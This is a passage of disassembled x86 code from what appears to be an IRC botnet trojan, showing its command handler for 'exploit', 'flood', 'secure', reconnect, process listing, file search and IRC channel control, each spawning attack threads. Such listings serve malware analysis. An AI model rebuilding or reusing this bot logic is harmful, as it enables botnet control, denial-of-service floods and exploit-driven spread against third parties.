lea eax, [ebp+4Ch+var_2D0]
push [ebp+4Ch+arg_4]
push [ebp+4Ch+arg_1C]
push eax
call sub_41D9E5
add esp, 0Ch
push eax
push [ebp+4Ch+var_9C]
push [ebp+4Ch+arg_4]
call sub_40123B
push offset dword_42ED74
jmp loc_404A12
; ---------------------------------------------------------------------------
loc_404CFE: ; CODE XREF: sub_40274D+15AB�j
; sub_40274D+15C0�j
push [ebp+4Ch+var_C]
push [ebp+4Ch+var_4]
push [ebp+4Ch+var_9C]
push [ebp+4Ch+arg_4]
call sub_417E10
loc_404D0F: ; CODE XREF: sub_40274D+372�j
; sub_40274D+234E�j ...
add esp, 10h
jmp loc_402B92
; ---------------------------------------------------------------------------
loc_404D17: ; CODE XREF: sub_40274D+1581�j
; sub_40274D+1596�j
cmp [ebp+4Ch+var_18], ebx
mov [ebp+4Ch+var_159C], bl
jz short loc_404D53
mov esi, [ebp+esi+4Ch+var_A0]
cmp esi, ebx
jz short loc_404D53
push esi
push [ebp+4Ch+var_18]
call sub_41F090
cmp eax, ebx
pop ecx
pop ecx
jz short loc_404D53
push eax
push offset aS ; "%s"
lea eax, [ebp+4Ch+var_159C]
push 80h
push eax
call sub_41E6FE
add esp, 10h
loc_404D53: ; CODE XREF: sub_40274D+25D3�j
; sub_40274D+25DB�j ...
push [ebp+4Ch+var_9C]
lea eax, [ebp+4Ch+var_161C]
push 80h
push eax
call sub_41E6FE
mov eax, [ebp+4Ch+arg_4]
mov [ebp+4Ch+var_1620], eax
mov eax, [ebp+4Ch+var_4]
mov [ebp+4Ch+var_1518], eax
mov eax, [ebp+4Ch+var_C]
mov [ebp+4Ch+var_1514], eax
lea eax, [ebp+4Ch+var_2D0]
push offset dword_42ED5C
push eax
call sub_41E6A6
push ebx
lea eax, [ebp+4Ch+var_2D0]
push 25h
push eax
call sub_40AE85
add esp, 20h
mov [ebp+4Ch+var_151C], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_1620]
push eax
push offset byte_417E51
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_151C]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4444FC[ecx], eax
jnz short loc_404DF3
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset unk_42ED24
jmp loc_40A211
; ---------------------------------------------------------------------------
loc_404DEB: ; CODE XREF: sub_40274D+26AC�j
push 32h
call ds:dword_42B014 ; Sleep
loc_404DF3: ; CODE XREF: sub_40274D+268B�j
cmp [ebp+4Ch+var_1510], ebx
jz short loc_404DEB
jmp loc_402B92
; ---------------------------------------------------------------------------
loc_404E00: ; CODE XREF: sub_40274D+1557�j
; sub_40274D+156C�j
push [ebp+4Ch+var_4]
push [ebp+4Ch+var_9C]
push [ebp+4Ch+arg_4]
call sub_417CF8
push offset dword_42ED0C
call sub_417D70
jmp loc_404976
; ---------------------------------------------------------------------------
loc_404E1D: ; CODE XREF: sub_40274D+152D�j
; sub_40274D+1542�j
push [ebp+4Ch+var_9C]
lea eax, [ebp+4Ch+var_B34]
push 80h
push eax
call sub_41E6FE
mov eax, [ebp+4Ch+arg_4]
mov esi, [ebp+esi+4Ch+var_A0]
mov [ebp+4Ch+var_B38], eax
mov eax, [ebp+4Ch+var_4]
mov [ebp+4Ch+var_AAC], eax
mov eax, [ebp+4Ch+var_C]
add esp, 0Ch
cmp esi, ebx
mov [ebp+4Ch+var_AA8], eax
jz short loc_404E71
push offset dword_42ED08
push esi
call sub_41E990
neg eax
sbb eax, eax
pop ecx
inc eax
pop ecx
mov [ebp+4Ch+var_AB0], eax
jmp short loc_404E77
; ---------------------------------------------------------------------------
loc_404E71: ; CODE XREF: sub_40274D+2708�j
mov [ebp+4Ch+var_AB0], ebx
loc_404E77: ; CODE XREF: sub_40274D+2722�j
lea eax, [ebp+4Ch+var_2D0]
push offset dword_42ECE8
push eax
call sub_41E6A6
push ebx
lea eax, [ebp+4Ch+var_2D0]
push 28h
push eax
call sub_40AE85
add esp, 14h
mov [ebp+4Ch+var_AB4], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_B38]
push eax
push offset aUnlMbS ; "Ul$Œì˜"
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_AB4]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4444FC[ecx], eax
jnz short loc_404EE8
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset unk_42ECAC
jmp loc_409AC1
; ---------------------------------------------------------------------------
loc_404EE0: ; CODE XREF: sub_40274D+27A1�j
push 32h
call ds:dword_42B014 ; Sleep
loc_404EE8: ; CODE XREF: sub_40274D+2780�j
cmp [ebp+4Ch+var_AA4], ebx
jz short loc_404EE0
jmp loc_406C6B
; ---------------------------------------------------------------------------
loc_404EF5: ; CODE XREF: sub_40274D+14B4�j
; sub_40274D+14C9�j
push offset aIiknc ; "iiKnc"
lea eax, [ebp+4Ch+var_2D0]
push offset dword_42EC94
push eax
call sub_41E6A6
push ebx
push [ebp+4Ch+var_4]
lea eax, [ebp+4Ch+var_2D0]
push eax
push [ebp+4Ch+var_9C]
push [ebp+4Ch+arg_4]
call sub_40123B
add esp, 20h
jmp loc_406C6B
; ---------------------------------------------------------------------------
loc_404F29: ; CODE XREF: sub_40274D+148A�j
; sub_40274D+149F�j
push ds:dword_4D1FD0
call sub_41D5F8
push eax
lea eax, [ebp+4Ch+var_2D0]
push offset unk_42EC68
push eax
call sub_41E6A6
push ebx
push [ebp+4Ch+var_4]
lea eax, [ebp+4Ch+var_2D0]
push eax
push [ebp+4Ch+var_9C]
push [ebp+4Ch+arg_4]
call sub_40123B
add esp, 24h
jmp loc_406C6B
; ---------------------------------------------------------------------------
loc_404F64: ; CODE XREF: sub_40274D+1460�j
; sub_40274D+1475�j
mov esi, [ebp+esi+4Ch+var_A0]
cmp esi, ebx
jz short loc_404F93
cmp [ebp+4Ch+var_18], ebx
jz short loc_404FA2
push esi
push [ebp+4Ch+var_18]
call sub_41F090
cmp eax, ebx
pop ecx
pop ecx
jz short loc_404FA2
push eax
push offset aQuitS ; "QUIT :%s\r\n"
push [ebp+4Ch+arg_4]
call sub_4011F5
add esp, 0Ch
jmp short loc_404FA2
; ---------------------------------------------------------------------------
loc_404F93: ; CODE XREF: sub_40274D+281D�j
push offset aQuitLater ; "QUIT :later\r\n"
push [ebp+4Ch+arg_4]
call sub_4011F5
pop ecx
pop ecx
loc_404FA2: ; CODE XREF: sub_40274D+2822�j
; sub_40274D+2831�j ...
push 0FFFFFFFEh
pop eax
jmp loc_402B95
; ---------------------------------------------------------------------------
loc_404FAA: ; CODE XREF: sub_40274D+1436�j
; sub_40274D+144B�j
push offset aQuitDisconnect ; "QUIT :disconnecting\r\n"
push [ebp+4Ch+arg_4]
call sub_4011F5
push offset dword_42EC18
call sub_417D70
add esp, 0Ch
or eax, 0FFFFFFFFh
jmp loc_402B95
; ---------------------------------------------------------------------------
loc_404FCC: ; CODE XREF: sub_40274D+140C�j
; sub_40274D+1421�j
push offset aQuitReconnecti ; "QUIT :reconnecting\r\n"
push [ebp+4Ch+arg_4]
call sub_4011F5
push offset dword_42EBE4
call sub_417D70
add esp, 0Ch
loc_404FE6: ; CODE XREF: sub_40274D+7915�j
xor eax, eax
jmp loc_402B95
; ---------------------------------------------------------------------------
loc_404FED: ; CODE XREF: sub_40274D+13E2�j
; sub_40274D+13F7�j
push [ebp+4Ch+var_4]
push [ebp+4Ch+var_9C]
push [ebp+4Ch+arg_4]
call sub_40B553
jmp loc_409DE9
; ---------------------------------------------------------------------------
loc_405000: ; CODE XREF: sub_40274D+13B8�j
; sub_40274D+13CD�j
push [ebp+4Ch+var_4]
push [ebp+4Ch+var_9C]
push [ebp+4Ch+arg_4]
call sub_40B4FF
jmp loc_409DE9
; ---------------------------------------------------------------------------
loc_405013: ; CODE XREF: sub_40274D+138E�j
; sub_40274D+13A3�j
push [ebp+4Ch+var_4]
push [ebp+4Ch+var_9C]
push [ebp+4Ch+arg_4]
call sub_40B494
jmp loc_409DE9
; ---------------------------------------------------------------------------
loc_405026: ; CODE XREF: sub_40274D+1364�j
; sub_40274D+1379�j
push [ebp+4Ch+var_4]
push [ebp+4Ch+var_9C]
push [ebp+4Ch+arg_4]
call sub_40B3C5
jmp loc_409DE9
; ---------------------------------------------------------------------------
loc_405039: ; CODE XREF: sub_40274D+12C8�j
; sub_40274D+12DD�j
push [ebp+esi+4Ch+var_A0]
push 27h
push offset aProcessList ; "Process list"
push offset dword_42EBC4
jmp short loc_40505B
; ---------------------------------------------------------------------------
loc_40504B: ; CODE XREF: sub_40274D+129E�j
; sub_40274D+12B3�j
push [ebp+esi+4Ch+var_A0]
push 24h
push offset aFindFile ; "Find file"
push offset dword_42EBA8
loc_40505B: ; CODE XREF: sub_40274D+EF1�j
; sub_40274D+F41�j ...
push [ebp+4Ch+var_C]
push [ebp+4Ch+var_4]
push [ebp+4Ch+var_9C]
push [ebp+4Ch+arg_4]
call sub_40B0BB
add esp, 20h
jmp loc_402B92
; ---------------------------------------------------------------------------
loc_405074: ; CODE XREF: sub_40274D+F05�j
; sub_40274D+F1A�j
mov edi, [ebp+esi+4Ch+var_A0]
cmp edi, ebx
jz short loc_405090
push edi
call sub_41E7AD
test eax, eax
pop ecx
jz short loc_405090
push edi
call sub_41E7AD
pop ecx
jmp short loc_405095
; ---------------------------------------------------------------------------
loc_405090: ; CODE XREF: sub_40274D+292D�j
; sub_40274D+2938�j
mov eax, ds:dword_43C070
loc_405095: ; CODE XREF: sub_40274D+2941�j
mov esi, [ebp+esi+4Ch+var_9C]
cmp esi, ebx
mov [ebp+4Ch+var_598], eax
jz short loc_4050B7
push esi
loc_4050A4: ; CODE XREF: sub_40274D+2979�j
lea eax, [ebp+4Ch+var_5A8]
push 10h
push eax
call sub_41E6FE
add esp, 0Ch
jmp short loc_4050CE
; ---------------------------------------------------------------------------
loc_4050B7: ; CODE XREF: sub_40274D+2954�j
cmp [ebp+4Ch+var_907], bl
jz short loc_4050C8
lea eax, [ebp+4Ch+var_D0]
push eax
jmp short loc_4050A4
; ---------------------------------------------------------------------------
loc_4050C8: ; CODE XREF: sub_40274D+2970�j
mov [ebp+4Ch+var_5A8], bl
loc_4050CE: ; CODE XREF: sub_40274D+2968�j
mov eax, [ebp+4Ch+var_4]
push [ebp+4Ch+var_9C]
mov esi, [ebp+4Ch+arg_4]
mov [ebp+4Ch+var_58C], eax
mov eax, [ebp+4Ch+var_C]
mov [ebp+4Ch+var_588], eax
lea eax, [ebp+4Ch+var_628]
push 80h
push eax
mov [ebp+4Ch+var_62C], esi
call sub_41E6FE
add esp, 0Ch
push [ebp+4Ch+var_598]
push esi
call sub_4023C9
pop ecx
push eax
lea eax, [ebp+4Ch+var_2D0]
push offset dword_42EB80
push eax
call sub_41E6A6
push ebx
lea eax, [ebp+4Ch+var_2D0]
push 19h
push eax
call sub_40AE85
add esp, 1Ch
mov [ebp+4Ch+var_594], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_62C]
push eax
push offset word_4144B2
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_594]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4444FC[ecx], eax
jnz short loc_40517F
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset dword_42EB44
jmp loc_40A211
; ---------------------------------------------------------------------------
loc_405177: ; CODE XREF: sub_40274D+2A38�j
push 32h
call ds:dword_42B014 ; Sleep
loc_40517F: ; CODE XREF: sub_40274D+2A17�j
cmp [ebp+4Ch+var_584], ebx
jz short loc_405177
jmp loc_402B92
; ---------------------------------------------------------------------------
loc_40518C: ; CODE XREF: sub_40274D+EB5�j
; sub_40274D+ECA�j
mov esi, [ebp+esi+4Ch+var_A0]
cmp esi, ebx
jz short loc_4051A9
push esi
call sub_41E7AD
test ax, ax
pop ecx
jz short loc_4051A9
push esi
call sub_41E7AD
pop ecx
jmp short loc_4051AF
; ---------------------------------------------------------------------------
loc_4051A9: ; CODE XREF: sub_40274D+2A45�j
; sub_40274D+2A51�j
mov ax, ds:word_43C080
loc_4051AF: ; CODE XREF: sub_40274D+2A5A�j
push [ebp+4Ch+var_9C]
mov esi, [ebp+4Ch+arg_4]
mov edi, [ebp+4Ch+var_4]
mov [ebp+4Ch+var_984], ax
mov eax, [ebp+4Ch+var_C]
mov [ebp+4Ch+var_974], eax
lea eax, [ebp+4Ch+var_A04]
push 80h
push eax
mov [ebp+4Ch+var_A08], esi
mov [ebp+4Ch+var_978], edi
call sub_41E6FE
movzx eax, [ebp+4Ch+var_984]
add esp, 0Ch
push eax
push esi
call sub_4023C9
pop ecx
push eax
lea eax, [ebp+4Ch+var_2D0]
push offset unk_42EB18
push eax
call sub_41E6A6
push ebx
push edi
lea eax, [ebp+4Ch+var_2D0]
push eax
push [ebp+4Ch+var_9C]
push esi
call sub_40123B
push ebx
lea eax, [ebp+4Ch+var_2D0]
push 6
push eax
call sub_40AE85
add esp, 30h
mov [ebp+4Ch+var_980], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_A08]
push eax
push offset loc_411555
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_980]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4444FC[ecx], eax
jnz short loc_40527B
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset unk_42EAD8
jmp loc_40A211
; ---------------------------------------------------------------------------
loc_405273: ; CODE XREF: sub_40274D+2B34�j
push 32h
call ds:dword_42B014 ; Sleep
loc_40527B: ; CODE XREF: sub_40274D+2B13�j
cmp [ebp+4Ch+var_970], ebx
jz short loc_405273
jmp loc_402B92
; ---------------------------------------------------------------------------
loc_405288: ; CODE XREF: sub_40274D+E61�j
; sub_40274D+E76�j ...
push edi
push offset aSecure ; "secure"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz short loc_4052B0
push edi
push offset aSec ; "sec"
call sub_41E990
test eax, eax
pop ecx
pop ecx
mov [ebp+4Ch+var_A18], ebx
jnz short loc_4052BA
loc_4052B0: ; CODE XREF: sub_40274D+2B4A�j
mov [ebp+4Ch+var_A18], 1
loc_4052BA: ; CODE XREF: sub_40274D+2B61�j
push [ebp+4Ch+var_9C]
lea eax, [ebp+4Ch+var_A9C]
push 80h
push eax
call sub_41E6FE
mov eax, [ebp+4Ch+arg_4]
mov [ebp+4Ch+var_AA0], eax
mov eax, [ebp+4Ch+var_4]
mov [ebp+4Ch+var_A14], eax
mov eax, [ebp+4Ch+var_C]
add esp, 0Ch
cmp [ebp+4Ch+var_A18], ebx
mov [ebp+4Ch+var_A10], eax
mov eax, offset aSecuring ; "Securing"
jnz short loc_4052FE
mov eax, offset aUnsecuring ; "Unsecuring"
loc_4052FE: ; CODE XREF: sub_40274D+2BAA�j
push eax
push offset dword_42EAA4
lea eax, [ebp+4Ch+var_2D0]
push 200h
push eax
call sub_41E6FE
push ebx
lea eax, [ebp+4Ch+var_2D0]
push 22h
push eax
call sub_40AE85
add esp, 1Ch
mov [ebp+4Ch+var_A1C], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_AA0]
push eax
push offset aUnlMbS_0 ; "Ul$Œì˜"
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_A1C]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4444FC[ecx], eax
jnz short loc_405375
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset dword_42EA68
jmp loc_408D01
; ---------------------------------------------------------------------------
loc_40536D: ; CODE XREF: sub_40274D+2C2E�j
push 32h
call ds:dword_42B014 ; Sleep
loc_405375: ; CODE XREF: sub_40274D+2C0D�j
cmp [ebp+4Ch+var_A0C], ebx
jz short loc_40536D
jmp loc_408D10
; ---------------------------------------------------------------------------
loc_405382: ; CODE XREF: sub_40274D+E37�j
; sub_40274D+E4C�j
push [ebp+4Ch+var_4]
push [ebp+4Ch+var_9C]
push [ebp+4Ch+arg_4]
call sub_41D41B
jmp loc_409DE9
; ---------------------------------------------------------------------------
loc_405395: ; CODE XREF: sub_40274D+E0D�j
; sub_40274D+E22�j
push offset unk_42E9B8
jmp loc_406C3F
; ---------------------------------------------------------------------------
loc_40539F: ; CODE XREF: sub_40274D+DE3�j
; sub_40274D+DF8�j
push offset aRx ; "rx"
push offset dword_42E9A4
jmp loc_4076D4
; ---------------------------------------------------------------------------
loc_4053AE: ; CODE XREF: sub_40274D+DB9�j
; sub_40274D+DCE�j
mov esi, [ebp+esi+4Ch+var_A0]
cmp esi, ebx
jz short loc_405407
push esi
call sub_41E7AD
cmp eax, ebx
pop ecx
jl short loc_4053FC
cmp eax, 3
jge short loc_4053FC
mov edx, [ebp+4Ch+arg_18]
mov ecx, eax
shl ecx, 7
lea esi, [ecx+edx]
cmp [esi], bl
jz short loc_4053F1
lea eax, [esi+1]
push eax
lea eax, [ebp+4Ch+var_2D0]
push offset unk_42FC70
push eax
call sub_41E6A6
mov [esi], bl
jmp loc_40698A
; ---------------------------------------------------------------------------
loc_4053F1: ; CODE XREF: sub_40274D+2C86�j
push eax
push offset unk_42E978
jmp loc_40697E
; ---------------------------------------------------------------------------
loc_4053FC: ; CODE XREF: sub_40274D+2C72�j
; sub_40274D+2C77�j
push eax
push offset unk_42E94C
jmp loc_40697E
; ---------------------------------------------------------------------------
loc_405407: ; CODE XREF: sub_40274D+2C67�j
mov edi, [ebp+4Ch+arg_18]
xor esi, esi
loc_40540C: ; CODE XREF: sub_40274D+2CD8�j
push [ebp+4Ch+var_A4]
push edi
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz short loc_40542C
inc esi
add edi, 80h
cmp esi, 3
jl short loc_40540C
jmp loc_40698D
; ---------------------------------------------------------------------------
loc_40542C: ; CODE XREF: sub_40274D+2CCC�j
mov eax, [ebp+4Ch+arg_18]
shl esi, 7
mov [esi+eax], bl
lea eax, [ebp+4Ch+var_D0]
push eax
push offset unk_42FC70
jmp loc_40697E
; ---------------------------------------------------------------------------
loc_405446: ; CODE XREF: sub_40274D+D8F�j
; sub_40274D+DA4�j
push [ebp+4Ch+var_A0]
push offset dword_42FBF4
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_403F48
call sub_40AFF6
loc_405462: ; CODE XREF: sub_40274D+2552�j
push ebx
call ds:dword_42B000 ; ExitProcess
loc_405469: ; CODE XREF: sub_40274D+1831�j
push offset aGet_0 ; "get"
push esi
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz loc_40550F
cmp ds:dword_4D5898, ebx
jz short loc_405495
push offset dword_4D5698
push offset unk_42E910
jmp loc_405521
; ---------------------------------------------------------------------------
loc_405495: ; CODE XREF: sub_40274D+2D37�j
push 10h
pop eax
push eax
mov [ebp+4Ch+var_2D8], eax
lea eax, [ebp+4Ch+var_2F0]
push ebx
push eax
call sub_41E5F0
add esp, 0Ch
lea eax, [ebp+4Ch+var_2D8]
push eax
lea eax, [ebp+4Ch+var_2F0]
push eax
push [ebp+4Ch+arg_4]
call ds:dword_42B220 ; getsockname
movzx eax, [ebp+4Ch+var_2EA]
push eax
movzx eax, [ebp+4Ch+var_2EB]
push eax
movzx eax, [ebp+4Ch+var_2EC]
push eax
lea eax, [ebp+4Ch+var_DB8]
push offset aD_D_D_ ; "%d.%d.%d.*"
push eax
call sub_41E6A6
lea eax, [ebp+4Ch+var_DB8]
push eax
lea eax, [ebp+4Ch+var_2D0]
push offset unk_42E910
push eax
call sub_41E6A6
add esp, 20h
jmp loc_403F9D
; ---------------------------------------------------------------------------
loc_40550F: ; CODE XREF: sub_40274D+2D2B�j
push esi
call ds:dword_44417C ; inet_addr
cmp eax, 0FFFFFFFFh
push esi
jnz short loc_405535
push offset unk_42E8D0
loc_405521: ; CODE XREF: sub_40274D+2D43�j
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_41E6A6
add esp, 0Ch
jmp loc_403F9D
; ---------------------------------------------------------------------------
loc_405535: ; CODE XREF: sub_40274D+2DCD�j
push offset dword_4D5698
call sub_41EEC0
push esi
lea eax, [ebp+4Ch+var_2D0]
push offset unk_42E8A4
push eax
mov ds:dword_4D5898, 1
call sub_41E6A6
add esp, 14h
jmp loc_403F9D
; ---------------------------------------------------------------------------
loc_405563: ; CODE XREF: sub_40274D+1819�j
push edi
push offset aExploit ; "exploit"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz loc_40565C
mov eax, [ebp+4Ch+var_4]
mov [ebp+4Ch+var_13EC], eax
mov eax, [ebp+4Ch+var_C]
mov [ebp+4Ch+var_13E8], eax
mov eax, [ebp+4Ch+arg_4]
mov esi, offset aImortal2_0 ; "#imortal2"
push esi
mov [ebp+4Ch+var_13FC], eax
mov edi, 80h
lea eax, [ebp+4Ch+var_147C]
push edi
push eax
mov [ebp+4Ch+var_13F4], 1
call sub_41E6FE
push esi
lea eax, [ebp+4Ch+var_14FC]
push edi
push eax
call sub_41E6FE
push [ebp+4Ch+var_8]
lea eax, [ebp+4Ch+var_150C]
push 10h
push eax
call sub_41E6FE
lea eax, [ebp+4Ch+var_150C]
push eax
lea eax, [ebp+4Ch+var_2D0]
push offset unk_42E86C
push eax
call sub_41E6A6
push ebx
lea eax, [ebp+4Ch+var_2D0]
push 8
push eax
call sub_40AE85
add esp, 3Ch
mov [ebp+4Ch+var_13F0], eax
lea eax, [ebp+4Ch+var_304]
push eax
push ebx
lea eax, [ebp+4Ch+var_150C]
push eax
push offset byte_40C15B
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_13F0]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4444FC[ecx], eax
jnz short loc_40564F
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset unk_42E82C
jmp loc_40697E
; ---------------------------------------------------------------------------
loc_405647: ; CODE XREF: sub_40274D+2F08�j
push 32h
call ds:dword_42B014 ; Sleep
loc_40564F: ; CODE XREF: sub_40274D+2EE7�j
cmp [ebp+4Ch+var_13E4], ebx
jz short loc_405647
jmp loc_40698D
; ---------------------------------------------------------------------------
loc_40565C: ; CODE XREF: sub_40274D+2E25�j
push edi
push offset aReconnect_in ; "reconnect.in"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_40A01D
push edi
push offset aRin ; "rin"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_40A01D
push edi
push offset aReconnect_in_m ; "reconnect.in.ms"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_409FE3
push edi
push offset aRinms ; "rinms"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_409FE3
push [ebp+4Ch+var_10]
push offset aFlood ; "flood"
call sub_41E990
test eax, eax
mov edi, ds:dword_42B014
pop ecx
pop ecx
jnz loc_406175
call ds:dword_42B038 ; GetTickCount
push eax
call sub_41ECD4
push [ebp+4Ch+var_8]
push offset aLoad ; "load"
call sub_41E990
add esp, 0Ch
test eax, eax
jnz short loc_405750
cmp [ebp+esi+4Ch+var_94], ebx
jz short loc_405750
push [ebp+esi+4Ch+var_94]
call sub_41E7AD
pop ecx
push eax
push [ebp+esi+4Ch+var_98]
call sub_41E7AD
pop ecx
push eax
push [ebp+esi+4Ch+var_9C]
call sub_41A954
push [ebp+esi+4Ch+var_98]
lea eax, [ebp+4Ch+var_2D0]
push [ebp+esi+4Ch+var_9C]
push [ebp+esi+4Ch+var_94]
push offset unk_42E7C4
push eax
call sub_41E6A6
add esp, 20h
cmp [ebp+4Ch+var_C], ebx
jnz short loc_405750
push ebx
push [ebp+4Ch+var_4]
lea eax, [ebp+4Ch+var_2D0]
push eax
push [ebp+4Ch+var_9C]
push [ebp+4Ch+arg_4]
call sub_40123B
add esp, 14h
loc_405750: ; CODE XREF: sub_40274D+2F9E�j
; sub_40274D+2FA4�j ...
push [ebp+4Ch+var_8]
push offset aPm ; "pm"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_4057B3
mov eax, [ebp+esi+4Ch+var_98]
cmp eax, ebx
jz short loc_4057B3
push offset asc_42FCE0 ; " "
push offset a_ ; "_"
push eax
call sub_41AB7D
push eax
lea eax, [ebp+4Ch+var_50FC]
push eax
call sub_41EEC0
lea eax, [ebp+4Ch+var_50FC]
push eax
push [ebp+esi+4Ch+var_9C]
lea eax, [ebp+4Ch+var_2D0]
push offset aPrivmsgSS ; "privmsg %s :%s"
push eax
call sub_41E6A6
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_41A24C
add esp, 28h
loc_4057B3: ; CODE XREF: sub_40274D+3014�j
; sub_40274D+301C�j
push [ebp+4Ch+var_8]
push offset dword_42E7A8
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_405816
mov eax, [ebp+esi+4Ch+var_98]
cmp eax, ebx
jz short loc_405816
push offset asc_42FCE0 ; " "
push offset a_ ; "_"
push eax
call sub_41AB7D
push eax
lea eax, [ebp+4Ch+var_4BF8]
push eax
call sub_41EEC0
lea eax, [ebp+4Ch+var_4BF8]
push eax
push [ebp+esi+4Ch+var_9C]
lea eax, [ebp+4Ch+var_2D0]
push offset dword_42E794
push eax
call sub_41E6A6
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_41A24C
add esp, 28h
loc_405816: ; CODE XREF: sub_40274D+3077�j
; sub_40274D+307F�j
push [ebp+4Ch+var_8]
push offset aNt ; "nt"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_405879
mov eax, [ebp+esi+4Ch+var_98]
cmp eax, ebx
jz short loc_405879
push offset asc_42FCE0 ; " "
push offset a_ ; "_"
push eax
call sub_41AB7D
push eax
lea eax, [ebp+4Ch+var_46F4]
push eax
call sub_41EEC0
lea eax, [ebp+4Ch+var_46F4]
push eax
push [ebp+esi+4Ch+var_9C]
lea eax, [ebp+4Ch+var_2D0]
push offset aNoticeSS_0 ; "notice %s :%s"
push eax
call sub_41E6A6
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_41A24C
add esp, 28h
loc_405879: ; CODE XREF: sub_40274D+30DA�j
; sub_40274D+30E2�j
push [ebp+4Ch+var_8]
push offset aMode ; "mode"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_4058DC
mov eax, [ebp+esi+4Ch+var_98]
cmp eax, ebx
jz short loc_4058DC
push offset asc_42FCE0 ; " "
push offset a_ ; "_"
push eax
call sub_41AB7D
push eax
lea eax, [ebp+4Ch+var_4DF8]
push eax
call sub_41EEC0
lea eax, [ebp+4Ch+var_4DF8]
push eax
push [ebp+esi+4Ch+var_9C]
lea eax, [ebp+4Ch+var_2D0]
push offset aModeSS ; "mode %s %s"
push eax
call sub_41E6A6
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_41A24C
add esp, 28h
loc_4058DC: ; CODE XREF: sub_40274D+313D�j
; sub_40274D+3145�j
push [ebp+4Ch+var_8]
push offset aJoin ; "join"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_405918
mov eax, [ebp+esi+4Ch+var_9C]
cmp eax, ebx
jz short loc_405918
push eax
lea eax, [ebp+4Ch+var_2D0]
push offset aJoinS ; "join %s"
push eax
call sub_41E6A6
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_41A24C
add esp, 10h
loc_405918: ; CODE XREF: sub_40274D+31A0�j
; sub_40274D+31A8�j
push [ebp+4Ch+var_8]
push offset aPart_0 ; "part"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_405954
mov eax, [ebp+esi+4Ch+var_9C]
cmp eax, ebx
jz short loc_405954
push eax
lea eax, [ebp+4Ch+var_2D0]
push offset aPartS ; "part %s"
push eax
call sub_41E6A6
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_41A24C
add esp, 10h
loc_405954: ; CODE XREF: sub_40274D+31DC�j
; sub_40274D+31E4�j
push [ebp+4Ch+var_8]
push offset aPartflood ; "partflood"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_405995
mov eax, [ebp+esi+4Ch+var_9C]
cmp eax, ebx
jz short loc_405995
push offset byte_42C60E
push eax
lea eax, [ebp+4Ch+var_2D0]
push offset aPartSS ; "part %s %s"
push eax
call sub_41E6A6
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_41A24C
add esp, 14h
loc_405995: ; CODE XREF: sub_40274D+3218�j
; sub_40274D+3220�j
push [ebp+4Ch+var_8]
push offset aPnick ; "pnick"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_405A04
cmp [ebp+esi+4Ch+var_9C], ebx
jz short loc_405A04
call ds:dword_42B038 ; GetTickCount
push eax
call sub_41ECD4
call sub_41ECDE
cdq
mov ecx, 0F423Fh
idiv ecx
lea eax, [ebp+4Ch+var_1810]
push edx
push [ebp+esi+4Ch+var_9C]
push offset aSI ; "%s%i"
push eax
call sub_41E6A6
lea eax, [ebp+4Ch+var_1810]
push eax
lea eax, [ebp+4Ch+var_2D0]
push offset aNickS_0 ; "NICK %s"
push eax
call sub_41E6A6
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_41A24C
add esp, 24h
loc_405A04: ; CODE XREF: sub_40274D+3259�j
; sub_40274D+325F�j
push [ebp+4Ch+var_8]
push offset aJoinPart ; "join/part"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz loc_405B36
cmp [ebp+esi+4Ch+var_9C], ebx
jz loc_405B36
push [ebp+esi+4Ch+var_9C]
lea eax, [ebp+4Ch+var_2D0]
push offset aJoinS ; "join %s"
